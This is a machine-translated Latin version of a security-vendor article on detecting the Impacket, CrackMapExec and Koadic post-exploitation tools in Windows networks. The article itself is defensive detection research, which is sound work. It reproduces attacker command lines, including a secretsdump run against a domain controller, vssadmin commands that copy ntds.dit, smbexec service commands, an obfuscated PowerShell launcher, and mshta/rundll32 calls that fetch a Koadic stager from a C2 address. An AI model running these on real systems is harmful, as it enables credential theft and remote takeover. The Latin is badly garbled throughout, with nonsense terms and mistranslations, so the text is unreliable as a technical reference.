🥇Quomodo impetus detegere Windows-infrastructura: exploratio instrumentorum piratarum informaticorum

Numerus impetus in sectore corporato quotannis crescit: eg in 2017, 13% plures casus singulares scripti sunt quam MMXVI et fine MMXVIII - XXVII% plures incident, quam tempore priore. Eae quoque ubi systema operandi instrumentum principale est. WindowsAnnis 2017-2018, APT Libellula, APT28, RECTUS MuddyWater impetus in regimen et instituta militaria in Europa, America Septentrionali et Arabia peracta. Et tria instrumenta ad hoc usi sumus. Impacket, CrackMapExec и Koadic. Eorum fons codicem apertum est et promptum in GitHub.

Notatu dignum est instrumenta haec non ad penetrationem initialem adhibita, sed ad impetum infrastructuram promovendam. Impugnatores illos diversos gradus oppugnationis sequuntur penetrationem perimetri. Hoc obiter difficile est deprehendere et saepe solum ope technologiae identifying vestigia compromissum in network traffic seu instrumenta quae patitur deprehendere activos invasoris actiones postquam infrastructure. Instrumenta varias functiones praebent, ab translatione fasciculorum ad commercium cum registro et mandatorum in machina remota exsequenda. Horum instrumentorum studium deduximus ad definiendas eorum retis activitatem.

Quod nobis opus est facere;

Intellige quomodo instrumenta operis caesim. Exquirite quid oppugnatores opus est uti et quibus artibus uti possint.
Invenies quod non deprehenditur per instrumenta securitatis informationis in primis oppugnationis gradibus. Investigationis tempus omitti potest, vel quia oppugnator est internus oppugnator, vel quia oppugnator foramen infrastructurae antea cognitae opprimit. Fieri potest ut totam suorum actuum catenam restituat, hinc desiderium motus ulterioris deprehendendi.
Eliminate falsum positivis ex intrusione deprehensio instrumenta. Non est oblivisci nos, cum actiones quaedam ex sola exploratione deteguntur, frequentes errores esse possibilis. Plerumque in infrastructura satis multi modi sunt, indiscretae a legitimis, prima specie, ad quascumque informationes obtinendas.

Quid haec instrumenta oppugnatoribus dant? Si Impacket hoc est, tunc oppugnatores magnam bibliothecam modulorum recipiunt qui in diversis gradibus oppugnationis, qui post perimetrum fractum est, consequi possunt. Multa instrumenta Impacket modulorum interne utuntur - exempli gratia, Metasploit. Habet dcomexec et wmiexec pro remota executione mandati, secretsdump ad rationes acquirendas ex memoria quae ab Impacket additae sunt. Quam ob rem recta detectio actionis talis bibliothecae derivatorum detectionem obtinebit.

Non coincidunt creatores scripsisse "potestatem ab Impacket" de CrackMapExec (vel simpliciter CME). Praeterea CME paratam fecit functionem pro missionibus popularibus: Mimikatz ad obtinendum passwords vel hashes, exsecutionem meterpretis vel agentis Imperii ad remotis executionem, et in tabula sanguinaria.

Tertium instrumentum quod elegimus est Koadic. Satis novum est, in conventu internationali hackerorum DEFCON 25 anno 2017 praesentatum, et modum insolitum praebet: per HTTP, JavaScript, et Microsoft Visual Basic Script (VBS) operatur. Hic modus "vivere ex terra" appellatur: instrumentum seriem dependentiarum et bibliothecarum in... WindowsCreatores id COM Command & Control, sive C3, appellant.

IMPACKET

Impacket munera satis lata sunt, a perscrutatione intra AD et collectione datorum ex internis servitoribus MS SQL ad rationes obtinendae credentialum, inter quas impetus SMB relay et recuperatio fasciculi ntds.dit continentis hashes tesserarum usoris a moderatore dominii. Impacket etiam mandata remote exsequitur utens quattuor modis diversis: WMI, servitio administrationis ordinatoris, et pluribus. Windows, DCOM et SMB, et testimonia ad hoc faciendum requirit.

Secretsdump

Inspice secretsdump. Modulus hic est qui utrumque usorem machinis et domicilii moderatoris oppugnare potest. Adhiberi potest exempla memoriae areas LSA, SAM, SECURITAS, NTDS.dit, ut videri potest in diversis gradibus oppugnationis. Primus gradus in operatione moduli est authenticas per SMB, quae vel tesseram usoris vel Nullam utentis postulat ut automatice impetum detrahendi expleat. Postrema petitio ut aditus ad servitii Imperium Manager (SCM) accedat et aditum ad subcriptio per winreg protocollum recipiat, utens quod oppugnator notitias usurarum invenire potest et proventus per SMB consequi.

In Fig. 1 Videmus quam exacte cum protocollo winreg utendo, accessum obtineatur utens subcriptio clavem cum LSA. Ad hoc utere mandato DCERPC cum opcode 15 - OpenKey.

Renatus. 1. Aperiens subcriptio key usus est winreg protocol

Deinde, cum aditus ad clavem obtinetur, valores cum imperio SaveKey opcode salvantur 20. Impacket hoc modo specialissimo facit. Valores fasciculi servat cuius nomen est chorda 8 characteribus incertis appensis cum .tmp. Praeterea, ulterior fasciculi huius fasciculi via SMB ex indice System32 (Fig. 2) occurrit.

Renatus. 2. colui cultum obtinendum subcriptio key a remotis machina

Evenit ut talis actio in retiaculis per interrogationes detegi possit in ramis quibusdam registris utentibus protocollo winreg, nominibus specificis, mandatis et ordine eorum.

Hic modulus etiam vestigia in registro eventuum relinquit. Windows, quibus gratias facile detegitur. Exempli gratia, exsecutione mandati

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

in periodico Windows Server Anno MMXVI haec series eventuum principalium videbitur:

1 4624. — remotis Logon.
2. 5145. — accessum reprimendo jura remota ad winreg servitium.
3. 5145 - accessum fasciculi reprimendorum iura in directorio System32. Tabella nomen temere de quo supra dictum est.
4 4688. — processus creando cmd.exe, quod vssadmin immittit;

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 — processum cum mandato creandi ;

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 — processum cum mandato creandi ;

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 — processum cum mandato creandi ;

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Sicut instrumenta multa post-abusionem, Impacket modulos habet ad mandata exequenda remotius. Smbexec intendunt, quod testam in machina remota interactive mandatum praebet. Cuius moduli etiam authenticas per SMB requirit, vel tessera vel tessera Nullam. In Fig. In Figura 3 videmus exemplum qualiter tale instrumentum operatur, in hoc casu Administrator localis consoletur.

Renatus. 3. Interactive smbexec console

Primus gradus smbexec post authenticas est SCM cum imperio OpenSCManagerW aperire (15). Nota quaesitio est: campus MachineName DUMMY est.

Renatus. 4. Request aperire Service Imperium Manager

Deinde, servitium creatur utens imperio CreateServiceW (12). In casu smbexec, idem praeceptum constructionis logicae omni tempore videre possumus. In Fig. 5 viridis indicat incommutabile praeceptum ambitum, fulvum indicat invasorem quid possit mutare. Facile est videre nomen fasciculi exsecutabilis, directorii et outputi, mutari posse, reliqua vero multo difficilius est mutare sine perturbatione moduli Impacket logicam.

Renatus. 5 Request creare ministerium per Service Imperium Manager

Smbexec etiam vestigia manifesta in registro eventuum relinquit. WindowsIn periodico Windows Server Anno MMXVI, pro mandato interactivo cum mandato ipconfig, hanc seriem eventuum clavium videmus:

1. 4697 — institutionem ministerii in machina victimae:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 — Creatio processus cmd.exe cum argumentis a puncto 1°.
3. 5145 - accessum reprimendo iura ad __output lima in indicem C$.
4. 4697 — institutionem ministerii in machina victimae.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 — Creatio processus cmd.exe cum argumentis a puncto 4°.
6. 5145 - accessum reprimendo iura ad __output lima in indicem C$.

Impacket est structura ad instrumenta impetus evolvenda. Fere omnia protocolla sustinet. Windows-infrastructuram, attamen proprias notas distinctas habet. Hae includunt interrogationes specificas winreg, usum API SCM cum sua structura mandatorum, formam nominis fasciculi, et communicationem SMB SYSTEM32.

CRACKMAPEXEC

Instrumentum CME principaliter designatum est ad automate illas actiones exercitationis quas oppugnator habet ad progrediendum in retis. Permittit tibi operam dare in coniunctione cum notissimo agente Imperii et meterprete. CME occulte mandata facere obfuscare. Utens Bloodhound (investigationis separatum instrumentum), oppugnator potest automate inquisitionem sessionis administratoris activitatis dominii.

Bloodhound

Sanguis canis, quasi instrumentum standi, exploratoris progressi in retiaculis concedit. Notitias colligit de utentibus, machinis, coetibus, sessionibus et suppletur ut scriptura PowerShell vel fasciculi binarii. LDAP vel protocolla substructio notitias colligendas adhibentur. CME integratio moduli permittit Bloodhound in machina victimae deponi, currere et recipere notitias collectas post executionem, inde actiones in systematis automating ac minus notabiles facere. Testa graphica sanguinea praebet notitias collectas in graphs forma, quae te permittit invenire brevissimam viam ab oppugnatoris machina ad administratorem domain.

Renatus. 6. Bloodhound Interface

Ut in machina victimae currat, modulus negotium creat utens ATSVC et SMB. ATSVC est interfacies ad operandum cum ordinatore negotiorum. WindowsCME functione sua NetrJobAdd (1) utitur ad officia per rete creanda. Exemplum eorum quae modulus CME mittit in Figura 7 monstratur: est mandatum cmd.exe et codex obscuratus in forma argumentorum XML.

Fig.7. Creando negotium per CME

Postquam negotium exsecutioni datum est, apparatus victimae ipsa sanguinis incipit, et hoc in negotiatione videri potest. Modulus notatur per LDAP queries ut vexillum coetus obtineat, indicem omnium machinarum et usorum in dominico, et informationem de activae usoris sessionibus per SRVSVC NetSessEnum petitionem obtinere.

Renatus. 8. Obtinens album sessionum activarum per SMB

Praeterea, deductis Bloodhound super machinam victimae cum audiendis paratibus, adiungitur eventus cum ID 4688 (processus creatio) et processus nomen. «C:WindowsSystem32cmd.exe». Quae notabilia sunt line argumentis praecipimus;

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Modulus "enum_avproducts" satis interesting est et functione et implementatione. WMI permittit ut notitias ex variis obiectis per linguam interrogationum WQL recuperes. Windows, quod fere est quod hic modulus CME utitur. Quaestiones ad classes AntiSpywareProduct et AntiMirusProduct de instrumentis securitatis in machina victimae installatis generat. Ad data necessaria obtinenda, modulus cum spatio nominum rootSecurityCenter2 connectitur, deinde quaestionem WQL generat et responsum accipit. Figura 9 contenta talium quaestionum et responsorum ostendit. In exemplo nostro, Windows Defendere.

Renatus. 9. Network actio moduli enum_avproducts

Saepe WMI audientes (Trace WMI-Activity), in quorum eventibus utiles informationes de WQL queries invenire potes, debilitari possunt. Si autem facultas est, si scriptum enum_avproductorum currendum est, eventus cum ID 11 salvabitur, nomen utentis, qui rogatum misit, nomenque in spatio nominali rootSecurityCenter2 continebit.

Singulae modulorum CME artificia sua habebant, specifica WQL quaesita sive creatio cuiusdam generis operis in schedula obfuscatione et actione sanguinis specificae in LDAP et SMB.

KOADIC

Proprietas propria Koadic est usus incorporatorum. Windows Interpretes JavaScript et VBScript. Hoc sensu, sequitur morem "de terra vivendi" — id est, nullas dependentias externas habet et instrumenta communia utitur. WindowsHoc instrumentum plenum est Imperii et Moderationis (CnC), nam post infectionem, "implantum" in machina inseritur, quod eam regi sinit. Talis machina, ut Koadic dicit, "zombi" appellatur. Si victimae satis privilegiorum ad plenam operationem deest, Koadic eam elevare potest utens modis praetermissionis UAC.

Renatus. 10. Koadic Testa

Hostia communicare debet cum servo Imperii & Imperii. Ad hoc faciendum, necesse est URI contactum antea praeparatum et corpus principale Koadic uno e scenicis utendo. In Fig. Figura 11 exemplum pro mshta scenici ostendit.

Renatus. 11. Initializing sessionem cum servo CnC

Ex responsione variabilis WS, manifestum fit executionem fieri per WScript. Shell, et variabiles STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPLORATIO continent notitias praecipuas de hodiernae sessionis parametris. Haec est prima par responsionis postulati in nexu HTTP cum servo CnC. Postulationes subsequentes directe pertinentes ad functionem vocati modulorum (inplantat). Omnes moduli Koadic solum in sessione activa cum CnC laborant.

Mimikatz

Sicut CME cum Bloodhound operatur, Koadic cum Mimikatz operatur in programmate separato et plures habet vias ad eam deducendam. Subter par responsionis postulatio est in Mimikatz deprimendo.

Renatus. 12. Translatio Mimikatz ad Koadic

Videre potes quomodo forma URI in rogatu mutata est. Nunc valorem continet pro variabilis csrf, quae moduli delecti respondet. Noli nomen eius auscultare; Omnes scimus CSRF aliter accipi solere. Responsum est idem agmen Koadic, cui ad Mimikatz codicem relatum est. Res magna est, ut in cardinis inspiciamus. Hic habemus bibliothecam Mimikatz descriptam in base64, a serialized .NET genus quod injiciet, et argumenta ad Mimikatz deducenda. Effectus exsecutio in retiaculis in textu perspicuo traducitur.

Renatus. 13. Ex currit Mimikatz in machina remota

Exec_cmd

Koadic etiam modulos habet, qui mandata remotius exequi possunt. Hic videbimus eandem URI generationis methodum & notas sid & csrf variabiles. In casu moduli exec_cmd, codice additur corpori, qui testudinem imperat capacem esse. Infra ostendetur tale codicem in responsione CnC servo HTTP contentum.

Renatus. 14. Implant codice exec_cmd

GAWTUUGCFI variabilis cum nota WS attributi ad supplicium requiritur. Ope, implantare testam vocat, duos ramos codicis processus — putamen.exec cum reditu e output datos amnis et concha sine reverti.

Koadic instrumentum typicum non est, sed artificia sua habet quibus in legitimo mercatu inveniri potest;

peculiari formatione petitionum HTTP;
usura winHttpRequests API,
creando WScript.Shell objectum per ActiveXObject,
magnum corpus exsecutabile.

Nexus initialis a scaenario initiatur, ita fieri potest ut eius actio per eventa detegatur. WindowsPro mshta, hoc est eventus 4688, qui creationem processus cum attributo "startup" indicat:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Dum Koadic currit, videre potes alios 4688 eventus cum attributis quae illam perfecte denotant;

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Inventiones

Mos vivendi ex terra inter sceleratos favorem auget. Utuntur machinis inclusis... Windows Instrumenta et mechanismos pro suis necessitatibus. Instrumenta popularia, ut Koadic, CrackMapExec, et Impacket, quae hoc principium sequuntur, magis magisque in relationibus APT apparere videmus. Numerus furcarum horum instrumentorum in GitHub etiam crescit, et nova apparent (hoc tempore circiter mille sunt). Haec consuetudo propter simplicitatem suam popularitatem adipiscitur: aggressores instrumenta tertiae partis non egent; iam in machinis victimarum praesentes sunt et eis adiuvant ut mensuras securitatis praetereant. Nos in studio interactionum retium intenti sumus: unumquodque instrumentum supra descriptum sua vestigia in commeatu retium relinquit; earum accurate studium nobis permisit productum nostrum exercere. PT Network Ascende Inventionis eas deprehendere, quae tandem adiuvat ad totam catenam cyberium incidentes investigandas.

auctores:

Antonius Tyurin, Caput Periti Services Department, PT Peritus Securitatis Centre, positivus Technologies
Egor Podmokov, peritus, PT Peritus Securitatis Centri, positivus Technologies

Source: www.habr.com